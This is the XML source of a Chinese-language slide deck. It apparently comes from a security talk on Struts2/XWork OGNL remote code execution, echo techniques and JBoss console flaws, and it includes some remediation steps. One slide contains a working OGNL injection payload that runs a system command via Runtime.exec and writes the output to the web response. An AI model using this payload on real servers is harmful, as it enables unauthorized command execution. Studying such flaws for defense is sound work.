            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1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3288" y="4005263"/>
            <a:ext cx="7129462" cy="2016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&lt;action name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>"t1" class="testve.T1"&gt;</a:t>
            </a:r>
          </a:p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	&lt;result name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>"success"&gt;/T1.jsp&lt;/result&gt;</a:t>
            </a:r>
          </a:p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&lt;/action&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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37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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>（背后的技术）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72707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t1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" smtClean="0"/>
              <a:t>!getFoo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>.action?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" smtClean="0"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>=aaa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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72708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9" y="2420888"/>
            <a:ext cx="799306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48733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开始之前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任何攻击技术，技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>本身</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>都是有限的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不讲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>SQL INJECTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>不讲业务逻辑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现在，我们打开了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>JAVA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网站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3990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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>（背后的技术）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="737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7373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1534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341438"/>
            <a:ext cx="82073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0258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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>（背后的技术）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="747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只有在看到错误信息时，才可以用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不需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>中有一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>类型的变量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3507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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>（感谢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>wofeiwo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>提醒）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean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719754"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="179512" y="404664"/>
          <a:ext cx="8856983" cy="6286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6983"/>
              </a:tblGrid>
              <a:tr h="62869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b="0" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>u0023a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b="0" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>u003d@java.lang.Runtime@getRuntime().exec(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" kern="100" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>netstat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>').</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" kern="100" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>getInputStream</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>()\u002c\u0023b\u003dnew </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" kern="100" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>java.io.InputStreamReader</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(\u0023a)\u002c\u0023c\u003dnew </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" kern="100" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>java.io.BufferedReader</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(\u0023b)\u002c\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>u0023kxlzx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b="0" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>u003d@org.apache.struts2.ServletActionContext@getResponse().</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" kern="100" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>getWriter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>()\u002c\u0023kxlzx.println(\u0023c.readLine())\u002c\u0023kxlzx.close())=1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="3200" b="0" kern="100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00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79512" y="3861048"/>
            <a:ext cx="7272337" cy="504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5656" y="4437112"/>
            <a:ext cx="6192688" cy="3600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4869160"/>
            <a:ext cx="3743325" cy="5032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931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3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>流程</a:t>
            </a:r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713" y="908050"/>
            <a:ext cx="5761037" cy="5834063"/>
          </a:xfr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8260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78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77828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975600" cy="634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975600" cy="634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8856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回显研究</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>流程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="788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response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>输出流</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>立刻关闭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的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>OGNL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>远程代码执行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59431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写教程让那群傻</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>跟着做</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="798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网吧</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>连接客户端，中文版被植入后门</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>为什么大家会下载</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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1403350" y="3573463"/>
            <a:ext cx="5184775" cy="100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4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>中文版</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="44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14146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写教程让那群傻</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>跟着做</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="808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翻译</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>教程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>傻瓜化</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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120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jboss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>漏洞的中文版</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="819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使用浏览器攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>JBOSS</a:t>
            </a:r>
          </a:p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05038"/>
            <a:ext cx="7848600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55650" y="2201863"/>
            <a:ext cx="5545138" cy="5032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26463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jboss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>漏洞的中文版</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="829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删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>jmx-console</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>web-console</a:t>
            </a:r>
          </a:p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391525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537464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框架指纹的手工确认</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean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架构师的故事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黑客的思路</a:t>
            </a:r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10732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jboss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>漏洞的中文版</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="839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8397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7840662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3828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jboss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>漏洞的中文版</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="849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所有的中文版修补方案，都没有提到</a:t>
            </a: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76475"/>
            <a:ext cx="80645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851275" y="2565400"/>
            <a:ext cx="3097213" cy="5032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71775" y="4221163"/>
            <a:ext cx="4176713" cy="5032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85057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jboss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>漏洞的中文版</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="860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8602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628775"/>
            <a:ext cx="8628063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99056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</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="870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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>xwork2.1.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>以上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>）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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>xwork1.0.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>）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Atlassian Confluence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>远程代码执行漏洞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3897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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>xwork2.1.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8806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57338"/>
            <a:ext cx="813435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06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xwork2.1.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN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0538" y="5586413"/>
            <a:ext cx="6794500" cy="5032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8595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远程代码执行（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>xwork2.1.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="890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Result "location" parameter should evaluate %{expr}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN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827088" y="2420938"/>
            <a:ext cx="7416800" cy="3024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&lt;action name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>"redirect"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class=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>"TestRedirectAction"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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="32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       &lt;result name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>"redirect"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type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>"redirect"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&gt;${redirectUrl}&lt;/result&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="32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&lt;/action&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="32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088" y="2420938"/>
            <a:ext cx="7416800" cy="3529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&lt;action name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>"redirect"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class=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>"TestRedirectAction"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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="32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       &lt;result name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>"redirect"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type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>"redirect"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&gt;%{redirectUrl}&lt;/result&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="32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&lt;/action&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="32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1103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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>xwork2.1.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="901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539750" y="1676400"/>
            <a:ext cx="8135938" cy="3455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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>public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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>static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String translateVariables(String expression, ValueStack stack) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="32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       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>return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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>translateVariables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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>new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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>char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[]{'$', '%'}, expression, stack, String.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>class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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>null</a:t>
            </a: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).toString();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="32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3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="32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400" y="1208088"/>
            <a:ext cx="8137525" cy="4860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 public static Object translateVariables(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>参数省略</a:t>
            </a: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) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="28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Object result = expression;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="28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800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>for (char open : openChars) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="28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800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>            while (true) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1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			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>。。。</a:t>
            </a:r>
          </a:p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                    String var = expression.substring(start + 2, end);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="28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                    Object o = stack.findValue(var, asType);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="280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73375" y="955675"/>
            <a:ext cx="2592388" cy="504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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>${expr1}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty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22575" y="5322888"/>
            <a:ext cx="2592388" cy="503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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>%{expr2}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty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86</a:t>
            </a:fld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15816" y="980728"/>
            <a:ext cx="2592388" cy="504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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
